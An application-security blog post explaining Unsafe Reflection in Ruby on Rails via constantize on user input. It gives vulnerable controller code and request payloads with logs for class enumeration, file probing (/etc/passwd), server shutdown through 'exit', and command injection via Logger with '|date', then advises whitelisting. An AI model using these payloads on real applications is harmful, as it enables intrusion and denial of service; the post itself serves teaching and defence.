Newsletter

Application Security

Exploiting Unsafe Reflection in Ruby/Rails Applications

By
Share

There is a class of vulnerabilities known as Unsafe Reflection [1] that has not been much discussed in the Ruby/Rails circle, despite being somewhat related to the recent deserialization vulnerabilities found in Rails. Unsafe Reflection vulnerabilities via constant creation occur in Ruby normally when the Module#const_get method is called with user-controlled data.

The Rails framework expands the number of reflection methods by defining String#constantize, String#safe_constantize and Module#qualified_const_get, all of them prone to Unsafe Reflection given an user-controlled input. These methods take a string and try to find a constant with the name specified, as can be seen in the following example:


Loading development environment (Rails 3.2.12)
irb(main):001:0> "File".constantize
=> File
irb(main):002:0> "Raaa".constantize
NameError: uninitialized constant Raaa
...

This is a dangerous code pattern [2] and very common, as we can see on GitHub [3]. The exploitation of this vulnerability depends on what is done with the returned constants. Generally, the attacker can change the application control flow in ways not intended by the developer to bypass security checks or execute unexpected operations.

A common use for these constants is to call the new and find methods. This observation is valuable to design techniques suitable to exploit these vulnerabilities. A few exploitation techniques for common Unsafe Reflection code patterns are shown below.

Class and module enumeration

It is possible to enumerate classes and modules (and gems) in the target system watching for uncaught exceptions. Example:

class TesteController < ApplicationController
    def index
        klass = params[:class].constantize
        ...
    end

Querying a non-existing module



Started GET "/teste/index?class=Raaaaa" for 127.0.0.1 at 2013-02-10 21:09:01 -0200
Processing by TesteController#index as HTML
  Parameters: {"class"=>"Raaaaa"}
Completed 500 Internal Server Error in 2ms

NameError (uninitialized constant Raaaaa):
  app/controllers/teste_controller.rb:3:in `index'

Querying an existing module


Started GET "/teste/index?class=Devise" for 127.0.0.1 at 2013-02-10 21:14:14 -0200
Processing by TesteController#index as HTML
  Parameters: {"class"=>"Devise"}
  Rendered teste/index.erb within layouts/application (1.1ms)
Completed 200 OK in 403ms (Views: 401.8ms | ActiveRecord: 0.0ms)

File and directory enumeration

If the code makes a call to new with an user-controllable parameter, then you can use it to enumerate files and directories in the system. Example:

class TesteController < ApplicationController
    def index
        klass = params[:class].constantize
        obj = klass.new(params[:arg])
        ...
    end

Querying an existing file


Started GET "/teste/index?class=File&arg=/etc/passwd" for 127.0.0.1 at 2013-02-10 21:20:05 -0200
Processing by TesteController#index as HTML
  Parameters: {"class"=>"File", "arg"=>"/etc/passwd"}
  Rendered teste/index.erb within layouts/application (0.1ms)
Completed 200 OK in 9ms (Views: 8.6ms | ActiveRecord: 0.0ms)

Querying a non-existing file


Started GET "/teste/index?class=File&arg=raaaaaaaa" for 127.0.0.1 at 2013-02-10 21:20:32 -0200
Processing by TesteController#index as HTML
  Parameters: {"class"=>"File", "arg"=>"raaaaaaaa"}
Completed 500 Internal Server Error in 0ms

Errno::ENOENT (No such file or directory - raaaaaaaa):

Denial of Service

It is possible to cause a Denial of Service attack, for example, by targeting classes which create symbols from user-controlled input or allow calling arbitrary methods. Example:

class TesteController < ApplicationController
    def index
        klass = params[:class].constantize
        obj = klass.new(params[:arg])
        ...
    end

Taking advantage of ActionController::MimeResponds::Collector in Rails 3.2.12. Use “exit!” to shutdown the application server.


Started GET "/teste/index?class=ActionController::MimeResponds::Collector&arg[]=exit" for 127.0.0.1 at 2013-02-10 21:27:01 -0200
Processing by TesteController#index as HTML
  Parameters: {"class"=>"ActionController::MimeResponds::Collector", "arg"=>["exit"]}
Completed 500 Internal Server Error in 1ms
SystemExit (exit):
  app/controllers/teste_controller.rb:4:in `new'
  app/controllers/teste_controller.rb:4:in `index'

Another Example:

class TesteController < ApplicationController
    def index
        klass = params[:class].constantize
        obj = klass.new(params[:arg1], params[:arg2])
        r = obj.somemethod
        ...
    end

Taking advantage of ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy [4] in Rails 3.2.12. Use “exit!” to shutdown the application server.


Started GET "/teste/index?class=ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy&arg1=xxx&arg2=exit" for 127.0.0.1 at 2013-02-10 21:51:01 -0200
Connecting to database specified by database.yml
Processing by TesteController#index as HTML
  Parameters: {"class"=>"ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy", "arg1"=>"xxx", "arg2"=>"exit"}
DEPRECATION WARNING: @exit is deprecated! Call exit.somemethod instead of @exit.somemethod. Args: []. (called from index at /home/user/myapp/app/controllers/teste_controller.rb:5)
Completed 500 Internal Server Error in 1ms

SystemExit (exit):
  app/controllers/teste_controller.rb:5:in `index'

Command Injection

If the code calls the new method, one way to achieve command injection is to instantiate the Logger class. Example:

class TesteController < ApplicationController
    def index
        klass = params[:class].constantize
        obj = klass.new(params[:arg])
        ...
    end

Executing a “date” command

Sun Feb 10 21:33:33 BRST 2013



Started GET "/teste/index?class=Logger&arg=%7cdate" for 127.0.0.1 at 2013-02-10 21:33:32 -0200
Connecting to database specified by database.yml
Processing by TesteController#index as HTML
  Parameters: {"class"=>"Logger", "arg"=>"|date"}
  Rendered teste/index.erb within layouts/application (3.8ms)
Completed 200 OK in 344ms (Views: 87.8ms | ActiveRecord: 0.0ms)

A safer way to use these methods is to apply a whitelist check over the string before the call to ensure that an allowed class/module will be constantized.

References

[1] http://cwe.mitre.org/data/definitions/470
[2] http://blog.littleimpact.de/index.php/2008/08/13/constantize-with-care/
[3] https://github.com/search?q=params+constantize&type=Code&ref=searchresults
[4] http://webuild.envato.com/blog/rails-3-dot-2-10-exploit-and-slow-read-attacks/

Originalmente postado no Blog da Conviso Application Security – Siga-nos no Twitter @conviso
Google+
Share
About author

Articles

A team of professionals, highly connected on news, techniques and information about application security
Related posts
Application Security

4 tips for those who want to invest in a career in Application Security

By
If you have become curious about the routine of an AppSec team and are considering this career, we…
Read more
Share
Application Security

"Forgot your password?" - The problem with security questions

By
As developers, we have as focus to think about applications that are more and more secure, more and…
Read more
Share
Application SecurityTech

Why APIs can be a high risk for companies

By
When we look at the development world and its evolution in the last few years, we can say that one…
Read more
Share

1 Comment

Deixe um comentário

%d bloggers like this: